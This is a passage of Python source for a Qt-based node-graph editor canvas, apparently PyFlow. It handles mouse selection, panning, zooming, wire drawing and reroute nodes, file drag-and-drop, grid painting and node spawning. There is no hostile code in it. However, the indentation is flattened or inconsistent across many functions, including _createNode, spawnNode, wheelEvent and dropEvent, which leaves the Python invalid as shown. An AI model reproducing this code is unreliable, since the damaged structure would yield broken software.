                    # begin rubber-band selection; snapshot current selection so
                    # Ctrl/Shift can add/remove relative to it in mouseMoveEvent
                    self.manipulationMode = CanvasManipulationMode.SELECT
                    self._selectionRect = SelectionRect(graph=self, mouseDownPos=self.mapToScene(event.pos()), modifiers=modifiers)
                    self._selectionRect.selectFullyIntersectedItems = True
                    self._mouseDownSelection = [node for node in self.selectedNodes()]
                    self._mouseDownConnectionsSelection = [node for node in self.selectedConnections()]
                    if modifiers not in [QtCore.Qt.ShiftModifier, QtCore.Qt.ControlModifier]:
                        self.clearSelection()
                else:
                    if hasattr(self, "_selectionRect") and self._selectionRect is not None:
                        self._selectionRect.destroy()
                        self._selectionRect = None
                LeftPaning = event.button() == QtCore.Qt.LeftButton and modifiers == QtCore.Qt.AltModifier
                if currentInputAction in InputManager()["Canvas.Pan"]:
                    self.manipulationMode = CanvasManipulationMode.PAN
                    self._lastPanPoint = self.mapToScene(event.pos())
                elif currentInputAction in InputManager()["Canvas.Zoom"]:
                    # remember the transform so drag-zoom stays anchored
                    self.manipulationMode = CanvasManipulationMode.ZOOM
                    self._lastTransform = QtGui.QTransform(self.transform())
                    self._lastSceneRect = self.sceneRect()
                    self._lastSceneCenter = self._lastSceneRect.center()
                    self._lastScenePos = self.mapToScene(event.pos())
                    self._lastOffsetFromSceneCenter = self._lastScenePos - self._lastSceneCenter
                self.node_box.hide()
        else:
            if not isinstance(self.pressed_item, NodesBox) and self.node_box.isVisible():
                self.node_box.hide()
                self.node_box.lineEdit.clear()
            if isinstance(self.pressed_item, UIPinBase) and not type(self.pressed_item) is PinGroup:
                if event.button() == QtCore.Qt.LeftButton and modifiers == QtCore.Qt.NoModifier:
                    # start drawing a realtime wire from this pin
                    self.pressed_item.topLevelItem().setFlag(QGraphicsItem.ItemIsMovable, False)
                    self.pressed_item.topLevelItem().setFlag(QGraphicsItem.ItemIsSelectable, False)
                    self._drawRealtimeLine = True
                    self.autoPanController.start()
                elif event.button() == QtCore.Qt.LeftButton and modifiers == QtCore.Qt.ControlModifier:
                    # Ctrl+LMB: detach all wires of the pin for reconnection
                    for wire in self.pressed_item.uiConnectionList:
                        if self.pressed_item.direction == PinDirection.Input:
                            wire.destinationPositionOverride = lambda: self.mapToScene(self.mousePos)
                        elif self.pressed_item.direction == PinDirection.Output:
                            wire.sourcePositionOverride = lambda: self.mapToScene(self.mousePos)
                        self.reconnectingWires.add(wire)
                if currentInputAction in InputManager()["Canvas.DisconnectPin"]:
                    self.removeEdgeCmd(self.pressed_item.connections)
                    self._drawRealtimeLine = False
            else:
                if isinstance(self.pressed_item, UIConnection) and modifiers == QtCore.Qt.AltModifier:
                    # Alt+LMB on a wire: splice a reroute node into it
                    reruteNode = self.getReruteNode(event.pos(), self.pressed_item)
                    self.clearSelection()
                    reruteNode.setSelected(True)
                    for inp in reruteNode.UIinputs.values():
                        if canConnectPins(self.pressed_item.source()._rawPin, inp._rawPin):
                            drawPin = self.pressed_item.drawSource
                            if self.pressed_item.source().isExec():
                                self.pressed_item.kill()
                            self.connectPins(self.pressed_item.source(), inp)
                            for conection in inp.connections:
                                conection.drawSource = drawPin
                            break
                    for out in reruteNode.UIoutputs.values():
                        drawPin = self.pressed_item.drawDestination
                        if canConnectPins(out._rawPin, self.pressed_item.destination()._rawPin):
                            self.connectPins(out, self.pressed_item.destination())
                            for conection in out.connections:
                                conection.drawDestination = drawPin
                            break
                    self.pressed_item = reruteNode
                    self.manipulationMode = CanvasManipulationMode.MOVE
                else:
                    if isinstance(self.pressed_item, UINodeBase) and node.isCommentNode:
                        if node.bResize:
                            return
                    if type(self.pressed_item) is PinGroup:
                        self.pressed_item.onClick()
                        return
                    if currentInputAction in InputManager()["Canvas.DragChainedNodes"]:
                        # drag the node together with everything chained to it
                        if node.isCommentNode:
                            self.manipulationMode = CanvasManipulationMode.PAN
                            return
                        if modifiers != QtCore.Qt.ShiftModifier:
                            self.clearSelection()
                        node.setSelected(True)
                        selectedNodes = self.selectedNodes()
                        if len(selectedNodes) > 0:
                            for snode in selectedNodes:
                                for n in node.getChainedNodes():
                                    n.setSelected(True)
                                snode.setSelected(True)
                    else:
                        if modifiers in [QtCore.Qt.NoModifier, QtCore.Qt.AltModifier]:
                            super(Canvas, self).mousePressEvent(event)
                        if modifiers == QtCore.Qt.ControlModifier and event.button() == QtCore.Qt.LeftButton:
                            node.setSelected(not node.isSelected())
                        if modifiers == QtCore.Qt.ShiftModifier:
                            node.setSelected(True)
                    if currentInputAction in InputManager()["Canvas.DragNodes"]:
                        self.manipulationMode = CanvasManipulationMode.MOVE
                        if self.pressed_item.objectName() == "MouseLocked":
                            super(Canvas, self).mousePressEvent(event)
                    if currentInputAction in InputManager()["Canvas.DragCopyNodes"]:
                        self.manipulationMode = CanvasManipulationMode.COPY
def pan(self, delta):
        """Shift the scene rect by *delta* viewport pixels, compensating for zoom."""
        sceneRect = self.sceneRect()
        scale = self.currentViewScale()
        sceneRect.translate(-delta.x() / scale, -delta.y() / scale)
        self.setSceneRect(sceneRect)
        self.update()
def updateRerutes(self, event, showPins=False):
        """Show pins on small reroute nodes near the cursor; hide them elsewhere.

        Reroutes within *tolerance* of the cursor are tracked in
        ``self.hoveredRerutes``; ones no longer hovered (or when *showPins* is
        False) get their pins hidden and are dropped from the list.
        """
        tolerance = 9 * self.currentViewScale()
        mouseRect = QtCore.QRect(QtCore.QPoint(event.pos().x() - tolerance, event.pos().y() - tolerance),
                                 QtCore.QPoint(event.pos().x() + tolerance, event.pos().y() + tolerance))
        hoverItems = self.items(mouseRect)
        self.hoveredRerutes += [node for node in hoverItems if isinstance(node, UIRerouteNodeSmall)]
        # BUGFIX: iterate over a snapshot — the old code removed entries from
        # self.hoveredRerutes while iterating it, skipping every other node
        for node in list(self.hoveredRerutes):
            if showPins and node in hoverItems:
                node.showPins()
            else:
                node.hidePins()
                self.hoveredRerutes.remove(node)
def mouseMoveEvent(self, event):
        """Drive the active canvas interaction as the mouse moves.

        Updates the resize cursor over resizable nodes, redraws the realtime
        wire (including Alt-to-reroute conversion and connect-target
        highlighting), and advances the current manipulation mode: rubber-band
        selection (with Ctrl/Shift add/remove), node move (with Alt reroute
        re-wiring), pan, drag-zoom, and drag-copy.
        """
        self.mousePos = event.pos()
        mouseDelta = QtCore.QPointF(self.mousePos) - self._lastMousePos
        modifiers = event.modifiers()
        node = self.nodeFromInstance(self.itemAt(event.pos()))
        self.viewport().setCursor(QtCore.Qt.ArrowCursor)
        # pick a resize cursor matching the hovered edge/corner of a resizable node
        if self.itemAt(event.pos()) and isinstance(node, UINodeBase) and node.resizable:
            resizeOpts = node.shouldResize(self.mapToScene(event.pos()))
            if resizeOpts["resize"] or node.bResize:
                if resizeOpts["direction"] in [(1, 0), (-1, 0)]:
                    self.viewport().setCursor(QtCore.Qt.SizeHorCursor)
                elif resizeOpts["direction"] in [(0, 1), (0, -1)]:
                    self.viewport().setCursor(QtCore.Qt.SizeVerCursor)
                elif resizeOpts["direction"] in [(1, 1), (-1, -1)]:
                    self.viewport().setCursor(QtCore.Qt.SizeFDiagCursor)
                elif resizeOpts["direction"] in [(-1, 1), (1, -1)]:
                    self.viewport().setCursor(QtCore.Qt.SizeBDiagCursor)
        if self._drawRealtimeLine:
            if isinstance(self.pressed_item, PinBase):
                if self.pressed_item.parentItem().isSelected():
                    self.pressed_item.parentItem().setSelected(False)
            if self.realTimeLine not in self.scene().items():
                self.scene().addItem(self.realTimeLine)
            self.updateRerutes(event, True)
            # wire endpoints: pressed pin center -> cursor (or hovered pin center)
            p1 = self.pressed_item.scenePos() + self.pressed_item.pinCenter()
            p2 = self.mapToScene(self.mousePos)
            mouseRect = QtCore.QRect(QtCore.QPoint(event.pos().x() - 5, event.pos().y() - 4),
                                     QtCore.QPoint(event.pos().x() + 5, event.pos().y() + 4))
            hoverItems = self.items(mouseRect)
            hoveredPins = [pin for pin in hoverItems if isinstance(pin, UIPinBase)]
            if len(hoveredPins) > 0:
                item = hoveredPins[0]
                if isinstance(item, UIPinBase) and isinstance(self.pressed_item, UIPinBase):
                    # color the wire by connectability and snap to the target pin
                    canBeConnected = canConnectPins(self.pressed_item._rawPin, item._rawPin)
                    self.realTimeLine.setPen(self.realTimeLineValidPen if canBeConnected else self.realTimeLineInvalidPen)
                    if canBeConnected:
                        p2 = item.scenePos() + item.pinCenter()
            else:
                self.realTimeLine.setPen(self.realTimeLineNormalPen)
            # cubic bezier between the endpoints
            distance = p2.x() - p1.x()
            multiply = 3
            path = QtGui.QPainterPath()
            path.moveTo(p1)
            path.cubicTo(QtCore.QPoint(p1.x() + distance / multiply, p1.y()),
                         QtCore.QPoint(p2.x() - distance / 2, p2.y()), p2)
            self.realTimeLine.setPath(path)
            if modifiers == QtCore.Qt.AltModifier:
                # Alt while dragging a wire: turn it into a reroute node and move that
                self._drawRealtimeLine = False
                if self.realTimeLine in self.scene().items():
                    self.removeItemByName('RealTimeLine')
                reruteNode = self.getReruteNode(event.pos())
                self.clearSelection()
                reruteNode.setSelected(True)
                for inp in reruteNode.UIinputs.values():
                    if canConnectPins(self.pressed_item._rawPin, inp._rawPin):
                        self.connectPins(self.pressed_item, inp)
                        break
                for out in reruteNode.UIoutputs.values():
                    if canConnectPins(self.pressed_item._rawPin, out._rawPin):
                        self.connectPins(self.pressed_item, out)
                        break
                self.pressed_item = reruteNode
                self.manipulationMode = CanvasManipulationMode.MOVE
        if self.manipulationMode == CanvasManipulationMode.SELECT:
            dragPoint = self.mapToScene(event.pos())
            self._selectionRect.setDragPoint(dragPoint, modifiers)
            # This logic allows users to use ctrl and shift with rectangle
            # select to add / remove nodes.
            node = self.nodeFromInstance(self.pressed_item)
            if isinstance(self.pressed_item, UINodeBase) and node.isCommentNode:
                nodes = [node for node in self.getAllNodes() if not node.isCommentNode]
            else:
                nodes = self.getAllNodes()
            if modifiers == QtCore.Qt.ControlModifier:
                # Ctrl: toggle relative to the selection captured at mouse-down
                # handle nodes
                for node in nodes:
                    if node in self._mouseDownSelection:
                        if node.isSelected() and self._selectionRect.collidesWithItem(node):
                            node.setSelected(False)
                        elif not node.isSelected() and not self._selectionRect.collidesWithItem(node):
                            node.setSelected(True)
                    else:
                        if not node.isSelected() and self._selectionRect.collidesWithItem(node):
                            node.setSelected(True)
                        elif node.isSelected() and not self._selectionRect.collidesWithItem(node):
                            if node not in self._mouseDownSelection:
                                node.setSelected(False)
                # handle connections
                for wire in self.connections.values():
                    if wire in self._mouseDownConnectionsSelection:
                        if wire.isSelected() and QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                            wire.setSelected(False)
                        elif not wire.isSelected() and not QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                            wire.setSelected(True)
                    else:
                        if not wire.isSelected() and QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                            wire.setSelected(True)
                        elif wire.isSelected() and not QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                            if wire not in self._mouseDownConnectionsSelection:
                                wire.setSelected(False)
            elif modifiers == QtCore.Qt.ShiftModifier:
                # Shift: add to the mouse-down selection
                for node in nodes:
                    if not node.isSelected() and self._selectionRect.collidesWithItem(node):
                        node.setSelected(True)
                    elif node.isSelected() and not self._selectionRect.collidesWithItem(node):
                        if node not in self._mouseDownSelection:
                            node.setSelected(False)
                for wire in self.connections.values():
                    if not wire.isSelected() and QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                        wire.setSelected(True)
                    elif wire.isSelected() and not QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                        if wire not in self._mouseDownConnectionsSelection:
                            wire.setSelected(False)
            elif modifiers == QtCore.Qt.ControlModifier | QtCore.Qt.ShiftModifier:
                # Ctrl+Shift: subtract from the selection
                for node in nodes:
                    if self._selectionRect.collidesWithItem(node):
                        node.setSelected(False)
                for wire in self.connections.values():
                    if QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                        wire.setSelected(False)
            else:
                # no modifier: plain replace-selection
                self.clearSelection()
                for node in nodes:
                    # if node not in [self.inputsItem,self.outputsItem]:
                    if not node.isSelected() and self._selectionRect.collidesWithItem(node):
                        node.setSelected(True)
                    elif node.isSelected() and not self._selectionRect.collidesWithItem(node):
                        node.setSelected(False)
                for wire in self.connections.values():
                    if not wire.isSelected() and QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                        wire.setSelected(True)
                    elif wire.isSelected() and not QtWidgets.QGraphicsWidget.collidesWithItem(self._selectionRect, wire):
                        wire.setSelected(False)
        elif self.manipulationMode == CanvasManipulationMode.MOVE:
            if self.pressed_item.objectName() == "MouseLocked":
                super(Canvas, self).mouseMoveEvent(event)
            else:
                newPos = self.mapToScene(event.pos())
                scaledDelta = mouseDelta / self.currentViewScale()
                selectedNodes = self.selectedNodes()
                # Apply the delta to each selected node
                for node in selectedNodes:
                    node.translate(scaledDelta.x(), scaledDelta.y())
                # Alt-dragging a reroute across a wire re-splices it into that wire
                if (isinstance(node, UIRerouteNode) or isinstance(node, UIRerouteNodeSmall)) and modifiers == QtCore.Qt.AltModifier:
                    mouseRect = QtCore.QRect(QtCore.QPoint(event.pos().x() - 1, event.pos().y() - 1),
                                             QtCore.QPoint(event.pos().x() + 1, event.pos().y() + 1))
                    hoverItems = self.items(mouseRect)
                    newOuts = []
                    newIns = []
                    for item in hoverItems:
                        if isinstance(item, UIConnection):
                            if list(node.UIinputs.values())[0].connections and list(node.UIoutputs.values())[0].connections:
                                if item.source() == list(node.UIinputs.values())[0].connections[0].source():
                                    newOuts.append([item.destination(), item.drawDestination])
                                if item.destination() == list(node.UIoutputs.values())[0].connections[0].destination():
                                    newIns.append([item.source(), item.drawSource])
                    for out in newOuts:
                        self.connectPins(list(node.UIoutputs.values())[0], out[0])
                    for inp in newIns:
                        self.connectPins(inp[0], list(node.UIinputs.values())[0])
        elif self.manipulationMode == CanvasManipulationMode.PAN:
            self.pan(mouseDelta)
        elif self.manipulationMode == CanvasManipulationMode.ZOOM:
            # horizontal drag distance maps to zoom in/out
            zoomFactor = 1.0
            if mouseDelta.x() > 0:
                zoomFactor = 1.0 + mouseDelta.x() / 100.0
            else:
                zoomFactor = 1.0 / (1.0 + abs(mouseDelta.x()) / 100.0)
            self.zoom(zoomFactor)
        elif self.manipulationMode == CanvasManipulationMode.COPY:
            delta = self.mousePos - self.mousePressPose
            # only start the copy once the drag passes a small threshold
            if delta.manhattanLength() > 15:
                self.manipulationMode = CanvasManipulationMode.MOVE
                selectedNodes = self.selectedNodes()
                copiedNodes = self.copyNodes(toClipBoard=False)
                self.pasteNodes(move=False, data=copiedNodes)
                scaledDelta = delta / self.currentViewScale()
                for node in self.selectedNodes():
                    node.translate(scaledDelta.x(), scaledDelta.y())
                EditorHistory().saveState("Drag copy nodes", modify=True)
        else:
            super(Canvas, self).mouseMoveEvent(event)
        self.autoPanController.Tick(self.viewport().rect(), event.pos())
        self._lastMousePos = event.pos()
def findPinNearPosition(self, scenePos, tolerance=3):
        """Return the topmost UI pin within *tolerance* (scaled) pixels of the
        given position, or None.

        NOTE(review): despite the parameter name, callers pass a viewport
        position (``event.pos()``) and it is used with ``self.items`` — confirm
        intended coordinate space before renaming.
        """
        radius = tolerance * self.currentViewScale()
        searchRect = QtCore.QRect(QtCore.QPoint(scenePos.x() - radius, scenePos.y() - radius),
                                  QtCore.QPoint(scenePos.x() + radius, scenePos.y() + radius))
        for item in self.items(searchRect):
            if isinstance(item, UIPinBase) and type(item) is not PinGroup:
                return item
        return None
def mouseReleaseEvent(self, event):
        """Finish the current canvas interaction on mouse release.

        Commits or tears off reconnecting wires, ends realtime wire drawing and
        rubber-band selection, connects the pressed/released pin pair (with
        cycle check), opens the node box on RMB click or pin release over empty
        space, and syncs the properties panel with the clicked node.
        """
        super(Canvas, self).mouseReleaseEvent(event)
        modifiers = event.modifiers()
        self.autoPanController.stop()
        self.mouseReleasePos = event.pos()
        self.released_item = self.itemAt(event.pos())
        self.releasedPin = self.findPinNearPosition(event.pos())
        self._resize_group_mode = False
        self.viewport().setCursor(QtCore.Qt.ArrowCursor)
        if self.manipulationMode == CanvasManipulationMode.MOVE and len(self.selectedNodes()) > 0:
            EditorHistory().saveState("Move nodes", modify=True)
        if len(self.reconnectingWires) > 0:
            if self.releasedPin is not None:
                # drop onto a pin: rewire each dragged end to the released pin
                for wire in self.reconnectingWires:
                    if wire.destinationPositionOverride is not None:
                        lhsPin = wire.source()
                        self.removeConnection(wire)
                        self.connectPinsInternal(lhsPin, self.releasedPin)
                        EditorHistory().saveState("Reconnect pins", modify=True)
                    elif wire.sourcePositionOverride is not None:
                        rhsPin = wire.destination()
                        self.removeConnection(wire)
                        self.connectPinsInternal(self.releasedPin, rhsPin)
                        EditorHistory().saveState("Reconnect pins", modify=True)
            else:
                # dropped over empty space: tear the connection off
                for wire in self.reconnectingWires:
                    self.removeConnection(wire)
                EditorHistory().saveState("Tear off connection", modify=True)
            for wire in self.reconnectingWires:
                wire.sourcePositionOverride = None
                wire.destinationPositionOverride = None
            self.reconnectingWires.clear()
        # restore the movability flags cleared while dragging from a pin
        for n in self.getAllNodes():
            if not n.isCommentNode:
                n.setFlag(QGraphicsItem.ItemIsMovable)
                n.setFlag(QGraphicsItem.ItemIsSelectable)
        if self._drawRealtimeLine:
            self._drawRealtimeLine = False
            if self.realTimeLine in self.scene().items():
                self.removeItemByName('RealTimeLine')
        if self.manipulationMode == CanvasManipulationMode.SELECT:
            self._selectionRect.destroy()
            self._selectionRect = None
        if event.button() == QtCore.Qt.RightButton and modifiers == QtCore.Qt.NoModifier:
            # show nodebox only if drag is small and no items under cursor
            if self.pressed_item is None or (isinstance(self.pressed_item, UINodeBase) and self.nodeFromInstance(self.pressed_item).isCommentNode):
                if modifiers == QtCore.Qt.NoModifier:
                    dragDiff = self.mapToScene(self.mousePressPose) - self.mapToScene(event.pos())
                    if all([abs(i) < 0.4 for i in [dragDiff.x(), dragDiff.y()]]):
                        self.showNodeBox()
        elif event.button() == QtCore.Qt.RightButton and modifiers == QtCore.Qt.ControlModifier:
            self.menu.exec_(QtGui.QCursor.pos())
        elif event.button() == QtCore.Qt.LeftButton and self.releasedPin is None:
            if isinstance(self.pressed_item, UIPinBase) and not self.resizing and modifiers == QtCore.Qt.NoModifier:
                if not type(self.pressed_item) is PinGroup:
                    # suggest nodes that can be connected to pressed pin
                    self.showNodeBox(self.pressed_item.direction, self.pressed_item._rawPin.getCurrentStructure())
        self.manipulationMode = CanvasManipulationMode.NONE
        if not self.resizing:
            p_itm = self.pressedPin
            r_itm = self.releasedPin
            do_connect = True
            for i in [p_itm, r_itm]:
                if not i:
                    do_connect = False
                    break
                if not isinstance(i, UIPinBase):
                    do_connect = False
                    break
            if p_itm and r_itm:
                # only plain UIPinBase instances (not subclasses) participate
                if p_itm.__class__.__name__ == UIPinBase.__name__ and r_itm.__class__.__name__ == UIPinBase.__name__:
                    if cycleCheck(p_itm, r_itm):
                        # print('cycles are not allowed')
                        do_connect = False
            if do_connect:
                if p_itm is not r_itm:
                    self.connectPins(p_itm, r_itm)
        # We don't want properties view go crazy
        # check if same node pressed and released left mouse button and not moved
        releasedNode = self.nodeFromInstance(self.released_item)
        pressedNode = self.nodeFromInstance(self.pressed_item)
        manhattanLengthTest = (self.mousePressPose - event.pos()).manhattanLength() <= 2
        if all([event.button() == QtCore.Qt.LeftButton, releasedNode is not None,
                pressedNode is not None, pressedNode == releasedNode, manhattanLengthTest]):
            # check if clicking on node action button
            if self.released_item is not None:
                if isinstance(self.released_item.parentItem(), NodeActionButtonBase):
                    return
            self.tryFillPropertiesView(pressedNode)
        elif event.button() == QtCore.Qt.LeftButton:
            self.requestClearProperties.emit()
        self.resizing = False
        self.updateRerutes(event, False)
        self.validateCommentNodesOwnership(self.graphManager.activeGraph(), False)
def removeItemByName(self, name):
[self.scene().removeItem(i) for i in self.scene().items() if hasattr(i, 'name') and i.name == name]
def tryFillPropertiesView(self, obj):
if isinstance(obj, IPropertiesViewSupport):
self.requestFillProperties.emit(obj.createPropertiesWidget)
def wheelEvent(self, event):
(xfo, invRes) = self.transform().inverted()
topLeft = xfo.map(self.rect().topLeft())
bottomRight = xfo.map(self.rect().bottomRight())
center = (topLeft + bottomRight) * 0.5
zoomFactor = 1.0 + event.delta() * self._mouseWheelZoomRate
self.zoom(zoomFactor)
    def stepToCompound(self, compoundNodeName):
        # Drill into a compound node by making its inner graph active.
        self.graphManager.selectGraphByName(compoundNodeName)
    def dragEnterEvent(self, event):
        """Accept drags of single local .pygraph/.compound/.pynode files.

        The actual work is deferred: a callable is stored in
        ``self.dropCallback`` and executed later by :meth:`dropEvent`.
        """
        if event.mimeData().hasUrls():
            urls = event.mimeData().urls()
            # Only single-file, local drops are supported.
            if len(urls) == 1:
                url = urls[0]
                if url.isLocalFile():
                    filePath = url.toLocalFile()
                    if filePath.endswith(".pygraph"):
                        with open(filePath, 'r') as f:
                            data = json.load(f)
                            # "fileVersion" marks a valid graph file.
                            if "fileVersion" in data:
                                event.accept()
                                # Load the entire graph file on drop.
                                self.dropCallback = partial(self.getApp().loadFromFileChecked, filePath)
                                return
                    elif filePath.endswith(".compound"):
                        with open(filePath, 'r') as f:
                            data = json.load(f)
                            def spawnCompoundFromData(data):
                                # Spawn a compound node under the cursor and
                                # fill it with the serialized sub-graph.
                                mousePos = self.mapToScene(self.mousePos)
                                compound = self.spawnNode("compound", mousePos.x(), mousePos.y())
                                compound.assignData(data)
                            event.accept()
                            self.dropCallback = partial(spawnCompoundFromData, data)
                            return
                    elif filePath.endswith(".pynode"):
                        with open(filePath, 'r') as f:
                            data = f.read()
                            def spawnPyNodeFromData(data):
                                # Spawn a python node and apply the file's
                                # source text to it.
                                mousePos = self.mapToScene(self.mousePos)
                                compound = self.spawnNode("pythonNode", mousePos.x(), mousePos.y())
                                compound.tryApplyNodeData(data)
                            event.accept()
                            self.dropCallback = partial(spawnPyNodeFromData, data)
                            return
        super(Canvas, self).dragEnterEvent(event)
def dragMoveEvent(self, event):
self.mousePos = event.pos()
if self.dropCallback is not None:
event.accept()
else:
super(Canvas, self).dragMoveEvent(event)
    def dragLeaveEvent(self, event):
        # The drag left the canvas; disarm any pending drop action.
        self.dropCallback = None
def dropEvent(self, event):
if self.dropCallback is not None:
self.dropCallback()
super(Canvas, self).dropEvent(event)
    def drawBackground(self, painter, rect):
        """Paint the canvas background: fill color, fine/coarse grids, and
        optional coordinate labels, all driven by the editable style sheet.
        """
        super(Canvas, self).drawBackground(painter, rect)
        lod = self.getLodValueFromCurrentScale(3)
        self.boundingRect = rect
        polygon = self.mapToScene(self.viewport().rect())
        painter.fillRect(rect, QtGui.QBrush(editableStyleSheet().CanvasBgColor))
        # Snap the starting grid position to the fine grid spacing.
        left = int(rect.left()) - (int(rect.left()) % editableStyleSheet().GridSizeFine[0])
        top = int(rect.top()) - (int(rect.top()) % editableStyleSheet().GridSizeFine[0])
        # Fine grid is only drawn when zoomed in enough (low LOD value).
        if lod < 3:
            # Draw horizontal fine lines
            gridLines = []
            y = float(top)
            while y < float(rect.bottom()):
                gridLines.append(QtCore.QLineF(rect.left(), y, rect.right(), y))
                y += editableStyleSheet().GridSizeFine[0]
            painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColor, 1))
            painter.drawLines(gridLines)
            # Draw vertical fine lines
            gridLines = []
            x = float(left)
            while x < float(rect.right()):
                gridLines.append(QtCore.QLineF(x, rect.top(), x, rect.bottom()))
                x += editableStyleSheet().GridSizeFine[0]
            painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColor, 1))
            painter.drawLines(gridLines)
        # Draw thick grid
        # Re-snap to the coarse grid spacing for the thick lines.
        left = int(rect.left()) - (int(rect.left()) % editableStyleSheet().GridSizeHuge[0])
        top = int(rect.top()) - (int(rect.top()) % editableStyleSheet().GridSizeHuge[0])
        # Draw vertical thick lines
        gridLines = []
        painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColorDarker, 1.5))
        x = left
        while x < rect.right():
            gridLines.append(QtCore.QLineF(x, rect.top(), x, rect.bottom()))
            x += editableStyleSheet().GridSizeHuge[0]
        painter.drawLines(gridLines)
        # Draw horizontal thick lines
        gridLines = []
        painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColorDarker, 1.5))
        y = top
        while y < rect.bottom():
            gridLines.append(QtCore.QLineF(rect.left(), y, rect.right(), y))
            y += editableStyleSheet().GridSizeHuge[0]
        painter.drawLines(gridLines)
        if editableStyleSheet().DrawNumbers[0] >= 1:
            # draw numbers
            scale = self.currentViewScale()
            # Keep label size readable when zoomed out (scale < 1).
            f = painter.font()
            f.setPointSize(6 / min(scale, 1))
            f.setFamily("Consolas")
            painter.setFont(f)
            y = float(top)
            while y < float(rect.bottom()):
                y += editableStyleSheet().GridSizeFine[0]
                # Label only multiples of 100, skipping the top margin.
                if abs(y) % 100 == 0 and y > rect.top() + 30:
                    painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColorDarker.lighter(300)))
                    painter.drawText(rect.left(), y - 1.0, str(y))
            x = float(left)
            while x < rect.right():
                x += editableStyleSheet().GridSizeHuge[0]
                if abs(x) % 100 == 0 and x > rect.left() + 30:
                    painter.setPen(QtGui.QPen(editableStyleSheet().CanvasGridColorDarker.lighter(300)))
                    painter.drawText(x, rect.top() + painter.font().pointSize(), str(x))
def _createNode(self, jsonTemplate):
# Check if this node is variable get/set. Variables created in child graphs are not visible to parent ones
# Stop any attempt to disrupt variable scope. Even if we accidentally forgot this check, GraphBase.addNode will fail
if jsonTemplate['type'] in ['getVar', 'setVar']:
var = self.graphManager.findVariableByUid(uuid.UUID(jsonTemplate['varUid']))
variableLocation = var.location()
graphLocation = self.graphManager.location()
if len(variableLocation) > len(graphLocation):
return None
if len(variableLocation) == len(graphLocation):
if Counter(variableLocation) != Counter(graphLocation):
return None
nodeInstance = getNodeInstance(jsonTemplate, self)
assert(nodeInstance is not None), "Node instance is not found!"
nodeInstance.setPos(jsonTemplate["x"], jsonTemplate["y"])
# set pins data
for inpJson in jsonTemplate['inputs']:
pin = nodeInstance.getPinSG(inpJson['name'], PinSelectionGroup.Inputs)
if pin:
pin.uid = uuid.UUID(inpJson['uuid'])
try:
pin.setData(json.loads(inpJson['value'], cls=pin.jsonDecoderClass()))
except:
pin.setData(pin.defaultValue())
if inpJson['bDirty']:
pin.setDirty()
else:
pin.setClean()
for outJson in jsonTemplate['outputs']:
pin = nodeInstance.getPinSG(outJson['name'], PinSelectionGroup.Outputs)
if pin:
pin.uid = uuid.UUID(outJson['uuid'])
try:
pin.setData(json.loads(outJson['value'], cls=pin.jsonDecoderClass()))
except:
pin.setData(pin.defaultValue())
if outJson['bDirty']:
pin.setDirty()
else:
pin.setClean()
return nodeInstance
def createNode(self, jsonTemplate, **kwargs):
nodeInstance = self._createNode(jsonTemplate)
EditorHistory().saveState("Create node {}".format(nodeInstance.name), modify=True)
return nodeInstance
def spawnNode(self, nodeClass, x, y):
packageName = None
for pkgName, pkg in GET_PACKAGES().items():
if nodeClass in pkg.GetNodeClasses():
packageName = pkgName
break
if packageName is not None:
jsonTemplate = NodeBase.jsonTemplate()
jsonTemplate["type"] = nodeClass
jsonTemplate["name"] = nodeClass
jsonTemplate["package"] = packageName
jsonTemplate["uuid"] = str(uuid.uuid4())
jsonTemplate["x"] = x
jsonTemplate["y"] = y
return self.createNode(jsonTemplate)
    def createWrappersForGraph(self, rawGraph):
        """Create UI wrappers (and wires) for every raw node in *rawGraph*."""
        # when raw graph was created, we need to create all ui wrappers for it
        uiNodesJsonData = {}
        for node in rawGraph.getNodesList():
            # Skip nodes that already have a UI wrapper.
            if node.getWrapper() is not None:
                continue
            uiNode = getUINodeInstance(node)
            uiNodeJsonTemplate = node.serialize()
            uiNodeJsonTemplate["wrapper"] = node.wrapperJsonData
            self.addNode(uiNode, uiNodeJsonTemplate, parentGraph=rawGraph)
            uiNode.updateNodeShape()
            uiNodesJsonData[uiNode] = uiNodeJsonTemplate
        # restore ui connections
        for rawNode in rawGraph.getNodesList():
            uiNode = rawNode.getWrapper()
            for outUiPin in uiNode.UIoutputs.values():
                for inputRawPin in getConnectedPins(outUiPin._rawPin):
                    # double call: getWrapper() presumably returns a weakref
                    # that must be dereferenced -- TODO confirm
                    inUiPin = inputRawPin.getWrapper()()
                    self.createUIConnectionForConnectedPins(outUiPin, inUiPin)
        # Show nodes of the active graph; comments start expanded so that
        # ownership can be computed before collapsing state is restored.
        for uiNode, data in uiNodesJsonData.items():
            if uiNode.isUnderActiveGraph():
                uiNode.show()
                if uiNode.isCommentNode:
                    uiNode.collapsed = False
        for uiNode, data in uiNodesJsonData.items():
            if uiNode.isUnderActiveGraph():
                if not uiNode.isCommentNode:
                    uiNode.updateOwningCommentNode()
        # comments should update collapsing info after everything was created
        for uiNode, data in uiNodesJsonData.items():
            if uiNode.isCommentNode:
                uiNode.collapsed = data["wrapper"]["collapsed"]
        self.validateCommentNodesOwnership(rawGraph)
        self.validateConnections(rawGraph)
    def addNode(self, uiNode, jsonTemplate, parentGraph=None):
        """Adds node to a graph

        :param uiNode: Raw node wrapper
        :type uiNode: :class:`~PyFlow.UI.Canvas.UINodeBase.UINodeBase`
        :param jsonTemplate: serialized node data used by ``postCreate``
        :param parentGraph: graph to add to when the raw node already belongs
            to a graph tree (e.g. compound copy/paste); otherwise the active
            graph is used
        """
        uiNode.canvasRef = weakref.ref(self)
        self.scene().addItem(uiNode)
        assert(jsonTemplate is not None)
        if uiNode._rawNode.graph is None:
            # if added from node box
            self.graphManager.activeGraph().addNode(uiNode._rawNode, jsonTemplate)
        else:
